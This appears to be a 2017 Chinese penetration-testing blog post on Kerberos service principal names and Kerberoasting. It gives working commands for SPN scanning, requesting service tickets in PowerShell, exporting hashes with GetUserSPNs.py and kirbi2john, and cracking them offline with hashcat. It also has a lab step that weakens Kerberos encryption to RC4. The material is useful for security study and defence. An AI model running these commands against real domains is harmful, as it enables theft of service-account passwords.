kerberos中的spn详解

 

0x01 SPN定义

   服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行身份验证,则给定的服务实例可以具有多个SPN。例如,SPN总是包含运行服务实例的主机名称,所以服务实例可以为其主机的每个名称或别名注册一个SPN。

0x02 SPN扫描

spn扫描也可以叫扫描Kerberos服务实例名称,在Active Directory环境中发现服务的最佳方法是通过“SPN扫描”。通过请求特定SPN​类型的服务主体名称来查找服务,SPN扫描攻击者通过网络端口扫描的主要好处是SPN扫描不需要连接到网络上的每个IP来检查服务端口。SPN扫描通过LDAP查询向域控制器执行服务发现。由于SPN查询是普通Kerberos票据的一部分,因此如果不能被查询,但可以用网络端口扫描来确认。

1.SPN格式

SPN = serviceclass “/” hostname [“:”port] [“/” servicename]

serviceclass = mssql

servicename =sql.bk.com

其中:

serviceclass:标识服务类的字符串,例如Web服务的www

hostname:一个字符串,是系统的名称。这应该是全限定域名(FQDN)。

port:一个数字,是该服务的端口号。

servicename:一个字符串,它是服务的专有名称(DN),objectGuid,Internet主机名或全限定域名(FQDN)。

注意: 服务类和主机是必需参数,但 端口和服务名是可选的,主机和端口之间的冒号只有当端口存在时才需要

 

2.常见服务和spn服务实例名称

MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433

Exchange

exchangeMDB/adsmsEXCAS01.adsecurity.org

RDP

TERMSERV/adsmsEXCAS01.adsecurity.org

WSMan / WinRM / PS Remoting

WSMAN/adsmsEXCAS01.adsecurity.org

Hyper-V Host

Microsoft Virtual Console Service/adsmsHV01.adsecurity.org

VMWare VCenter

STS/adsmsVC01.adsecurity.org

2.SPN扫描的ps脚本

发现mssql服务中的spn服务实例名称:

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSSQLServers

其他的SPN服务实例名查询:

https://github.com/PyroTek3/PowerShell-AD-Recon

由于每台服务器都需要注册用于Kerberos身份验证服务的SPN,因此这为在不进行端口扫描的情况下收集有关环境的信息提供了一个完美的方法。

例如:

管理员在名为“MetcorpKCS17”的服务器上安装和配置Microsoft SQL Server,并使用侦听端口3170 3&3171的SQL实例。

那么服务类和实例名称产生是这样的:

MSSQLSvc/MetcorpKCS17.adsecurity.org:3170
MSSQLSvc/MetcorpKCS17.adsecurity.org:3171

蓝色的部分是服务类,橙色的部分是计算机的FQDN,绿色的最后一部分是网络端口号由于Kerberos将SPN请求与目录中的现有SPN相匹配,因此最后的数字不一定是服务在服务器上侦听的端口。如上所述,大多数情况下SPN中记录的端口是服务器上的监听端口,并非所有的SPN都包含一个端口。现在,我们有一个更好的方法来发现Active Directory域或森林中的SQL服务器:ServicePrincipalName=MSSQL*

0x03 SPN扫描和破解TGS Tickets

以MSSQL服务配置SPN为例

参考配置地址:
https://technet.microsoft.com/zh-cn/library/bb735885.aspx

1.为 SQL Server 服务帐户注册SPN

手动注册:
setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname
对应的命名实例:
setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname

2.查看用户对应的SPN:
setspn -L ruos\sql-service

3.使用ADSI(adsiedit.msc)查看用户属性

 

 

4. 在AD上为用户指定服务登陆权限。

GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment
Log on as a service

 

 

5..更改 SQL Server 服务帐户为域用户帐户

6.暴力破解Kerberos TGS Tickets

由于加密类型是RC4_HMAC_MD5,Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。

7.SPN扫描

setspn -T domain -q */*

或者
https://github.com/PyroTek3/PowerShell-AD-Recon/

 

8.请求SPN Kerberos Tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel

PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS"

9. 查看并导出票据

 

 

默认配置加密类型是aes256_hmac,tgsrepcrack无法破解,可在服务器组策略指定加密类型为RC4_HMAC_MD5。
GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options
Network security: Configure encryption types allowed for Kerberos

10.离线破解

tgsrepcrack(仅对RC4_HMAC_MD5),或者保存hash使用hashcat破解。

 

导出hash(用于其他加密类型)
GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2
或者从票据中导出 kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi
S2. hashcat64.exe -m 13100 hash.txt example.dict –force

也可以参考其他破解工具如下:

https://github.com/nidem/kerberoast
https://github.com/coresecurity/impacket
https://github.com/nidem/kerberoast/blob/master/kirbi2john.py

0x04 Active Directory服务主体名称(SPN)的综合参考表

注意:

域控制器自动将公共SPN映射到主机SPN中。计算机加入到域时,主机SPN自动添加到所有计算机帐户的ServicePrincipalName属性。域控制器SPN映射由SPNMappings中的以下位置中的属性控制:

“CN=Directory Service,CN=WindowsNT,CN=Services,CN=Configuration

SPN自动映射到HOST(SPNMapping属性值):

alerter

appmgmt

cisvc

clipsrv

browser

dhcp

dnscache

replicator

eventlog

eventsystem

policyagent

oakley

dmserver

dns

mcsvc

fax

msiserver

ias

messenger

netlogon

netman

netdde

netddedsm

nmagent

plugplay

protectedstorage

rasman

rpclocator

rpc

rpcss

remoteaccess

rsvp

samss

scardsvr

scesrv

seclogon

scm

dcom

cifs

spooler

snmp

schedule

tapisrv

trksvr

trkwks

ups

time

wins

www

http

w3svc

iisadmin

msdtc

 

 

posted @ 2017-12-21 21:47  渗透测试中心  阅读(...)  评论(...编辑  收藏